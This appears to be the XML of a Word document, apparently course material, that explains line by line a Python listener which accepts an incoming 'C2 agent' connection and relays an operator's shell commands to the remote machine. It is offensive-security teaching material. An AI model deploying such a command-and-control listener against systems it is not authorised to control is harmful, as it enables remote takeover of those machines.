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CFFE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Import the standard socket library to handle low-level TCP/IP network layer communications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B480F8C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import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</w:p>
    <w:p w14:paraId="16896A9E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Import the subprocess module to interact directly with the host machine's underlying operating system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CBF382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import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</w:p>
    <w:p w14:paraId="1B49A057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Import the system-specific parameters and functions module to interact closely with the Python interpreter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298E279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import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sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3536FD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Import the time library to introduce programmatic delays, sleeps, or scheduling capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B6BA5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import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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD436E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Import the threading library to enable concurrent execution of code blocks using separate execution paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F008611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import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threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223E902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 xml:space="preserve"># Import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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asyncio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> to lay structural foundations for asynchronous, non-blocking asynchronous routines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AEB95B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import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asyncio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0809CAC7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Import the io module to manage in-memory file streams, string buffers, and input/output operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB4EB49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import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io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B35C2A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Import the operating system module to execute platform-agnostic commands and system-level process terminations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E3687C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import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</w:p>
    <w:p w14:paraId="6F2C43D9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 xml:space="preserve"># Commented out import for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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readline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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, which is typically used for command history or tab-completion in interactive shells.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033BDC4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 xml:space="preserve">#import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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readline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C03CB44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 xml:space="preserve"># Import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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colorama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> to initialize ANSI escape character sequences for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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colored</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> terminal command output formatting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899B8FC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import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colorama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C5A67C0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 xml:space="preserve"># Import foreground, background, and style sub-modules from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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colorama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> to apply distinct visual aesthetics to console text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B002D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from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colorama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import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Fore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, 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Back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, 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Style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F528682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</w:p>
    <w:p w14:paraId="6BFED9A1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Define a concurrency handler function dedicated to receiving incoming command execution data streams from the client agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFDC5E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def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shellreceiver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conn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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE5C4C2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Establish an infinite operational loop designed to continuously scan the active network socket for data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBA32AC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</w:t>
      </w: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while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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0536D56B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Establish a try-except structure to gracefully handle runtime connection failures or abrupt socket drops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A610B0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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAE6DC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Read incoming data stream from the network socket buffer precisely one single byte at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD7653B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data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conn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.recv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r w:rsidRPr="00655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1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7E536411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Decode the raw byte string to standard text, preventing newlines and immediately forcing output rendering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6032E5FF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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r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print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data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.decode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(), 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end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655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>""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, 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flush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655E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1BAE515D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Intercept any runtime execution anomalies, exceptions, or connection state drops happening on the socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09741B94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except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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4652B87C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Display a specific operational alert notifying the user that connection integrity has completely collapsed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C3DF8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gramStart"/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print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655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"server/socket must have died...time to hop off"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2F623387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Safely close the active socket descriptor object to free up system networking resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655F9330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conn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.close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E8DC7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Force an immediate, hard termination of the entire Python interpreter instance process via status code 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B1D001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_exit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655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17857F7F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</w:p>
    <w:p w14:paraId="7778E966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Define a concurrency handler function dedicated to capturing operator text inputs and sending them to the client target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749EEC15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def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shellsender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conn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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3CF8D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Establish an infinite loop to keep the operator input shell interface running continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE19AE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</w:t>
      </w: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while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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBC10A9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Intercept plain-text operator input straight from the keyboard via standard system input channels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D8052E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</w:t>
      </w:r>
      <w:proofErr w:type="spell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mycmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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gramStart"/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input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655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>""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1B4B6AC3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Append a standard newline character sequence to ensure the target machine's shell executes the string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B8565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</w:t>
      </w:r>
      <w:proofErr w:type="spell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mycmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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mycmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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+</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67494343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Implement a try-block to monitor network delivery operations and trap potential transit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A65DCD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try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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096929A3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Convert the text command string into raw network bytes and transmit them through the established socket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F137B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conn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.send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mycmd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encode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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B1CAE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Catch unexpected disruptions, broken pipes, or termination events occurring mid-transit on the socket interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9809E0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except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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFC395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Print a distinct debugging notification detailing structural communication layer failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF0E30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gramStart"/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print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655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"server/socket must have died...time to hop off"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188FFFDC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Close out active socket configurations to prevent socket leak states on the local host operating system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67576C24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conn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.close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDC9D63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Initiate a low-level process escape function to kill all running execution components instantly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E9F8D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_exit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655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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138BD418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</w:p>
    <w:p w14:paraId="76545789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Assign the fallback local listener IP address to match all available network interface systems globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF132A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host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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"0.0.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037EF76C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lastRenderedPageBreak/>
        <w:t># Configure the specific TCP target listening port identifier code for our incoming C2 framework agent traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E69073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port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4546</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004057AF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</w:p>
    <w:p w14:paraId="3F708820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Initialize a streaming internet socket object leveraging standard IPv4 routing configurations and TCP mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B230C44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proofErr w:type="spell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AF_INET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SOCK</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_STREAM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6A9A705B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Alter local socket level attributes to permit immediate reuse of the local network interface port address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D5433A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proofErr w:type="spellStart"/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setsockopt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proofErr w:type="spell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SOL_SOCKET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SO_REUSEADDR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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00655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1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2D80DEB0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Bind the configured network socket structure to the predefined host interface string and numeric port details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EBDEE1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proofErr w:type="spellStart"/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bind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((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host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, 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port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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD22884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Command the network interface stack to start listening for incoming connections, permitting a maximum backlog queue of 5 requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B69346E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proofErr w:type="spellStart"/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listen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r w:rsidRPr="00655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5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0E0D500F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 xml:space="preserve"># Print a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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vibrant yellow-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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colored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 xml:space="preserve"> initialization message notifying the operator that the server is listening for agents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC4F8BC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proofErr w:type="gramStart"/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print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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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Fore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YELLOW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+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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"[+] listening on port "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+</w:t>
      </w:r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str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port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), </w:t>
      </w:r>
      <w:proofErr w:type="spell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Fore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WHITE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3287215C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</w:p>
    <w:p w14:paraId="051790D4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Pause master execution thread to await connection handshakes, returning a unique session link object and IP source list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BD6A6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conn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addr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accept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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B06A300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Log an active, visually bright green message confirming successful communication establishment with the remote agent VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A82B36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proofErr w:type="gramStart"/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print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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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Fore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GREEN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, </w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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f</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00655EF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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">*] Accepted new connection from: </w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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{</w:t>
      </w:r>
      <w:proofErr w:type="spell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addr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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00655E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}</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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{</w:t>
      </w:r>
      <w:proofErr w:type="spell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addr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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00655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1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]</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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}</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>'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Fore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WHITE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668EAC54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</w:p>
    <w:p w14:paraId="0A75FA25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Code comment indicating the visual boundary where active threading mechanics are initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A18EF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#New code starts here. This initiates our threads!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6B6B34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##################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC96C4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Instantiate a separate system thread worker mapped to continuously pull target output data from the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shellreceiver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21308DD5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s2p_thread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threading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target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shellreceiver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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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conn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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, ]</w:t>
      </w:r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5EBDF9CC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Convert this specific worker thread into a background daemon so it terminates gracefully when the parent process stops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3924E3A6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thread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daemon</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="573E174B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Boot up the newly configured background daemon thread to start listening to the socket channel concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041076BC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thread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start</w:t>
      </w:r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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A7BFA6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</w:p>
    <w:p w14:paraId="6C70035E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Instantiate another operational execution thread worker dedicated to pushing outbound user entries via the `</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shellsender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E129B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s2p_thread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threading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target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shellsender</w:t>
      </w:r>
      <w:proofErr w:type="spell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args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/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[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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conn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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, ]</w:t>
      </w:r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085C75B1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 xml:space="preserve"># Define this worker as a background daemon process to align execution lifecycles with core framework </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1BAF50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thread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daemon</w:t>
      </w:r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</w:p>
    <w:p w14:paraId="672169C0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lastRenderedPageBreak/>
        <w:t># Boot up the text payload transfer worker thread path to facilitate outbound communication concurrently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E2D4DA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655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>thread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start</w:t>
      </w:r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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C6A77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##################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D24B6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</w:p>
    <w:p w14:paraId="0F56068E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Descriptive tracking note indicating the starting point of the continuous operational keeping structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72461E0B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#continuous loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB8F80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NG"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>while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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCCC95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</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t># Introduce a 1-second process execution pause inside the master loop thread execution cycle to prevent extreme CPU exhaustion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15015AFB" w14:textId="77777777" w:rsidR="00655EFA" w:rsidRPr="00655EFA" w:rsidRDefault="00655EFA" w:rsidP="00655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</w:pP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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00655E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time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.</w:t>
      </w:r>
      <w:r w:rsidRPr="00655E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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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(</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00655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G"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1887CB" w14:textId="5DAB394E" w:rsidR="00655EFA" w:rsidRDefault="00655EFA" w:rsidP="00655EFA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00655E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FA"/>
    <w:rsid w:val="003C1238"/>
    <w:rsid w:val="00655EFA"/>
    <w:rsid w:val="00D2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51E8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BFC4EEC5-F63D-4803-8A19-B946FCCE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5B92FF22FAC44E950CF8BC9160185E" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="8e36f23ec5483a55d0ce9956695fd8c4">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="f5b99105-96d1-4cfa-8dd4-2cf3826ced41" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="399c60db948775380308ccf789f53370" ns3:_="">
    <xsd:import namespace="f5b99105-96d1-4cfa-8dd4-2cf3826ced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99105-96d1-4cfa-8dd4-2cf3826ced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b99105-96d1-4cfa-8dd4-2cf3826ced41" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{E37A0004-25C2-4C82-BA16-C558CEF0AB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99105-96d1-4cfa-8dd4-2cf3826ced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79A6D9-661B-4766-8FBA-9EB38755BF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62C213-A04C-4319-90AA-FC7D3987149D}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="f5b99105-96d1-4cfa-8dd4-2cf3826ced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1038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Macpherson Aghah</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Macpherson Aghah</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-25T16:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T16:16:00Z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2026-05-25T14:00:00Z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6c767387-a605-4b51-888e-c4f8c8c7c349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0x0101007E5B92FF22FAC44E950CF8BC9160185E</vt:lpwstr>
  </property>
</Properties>
</file>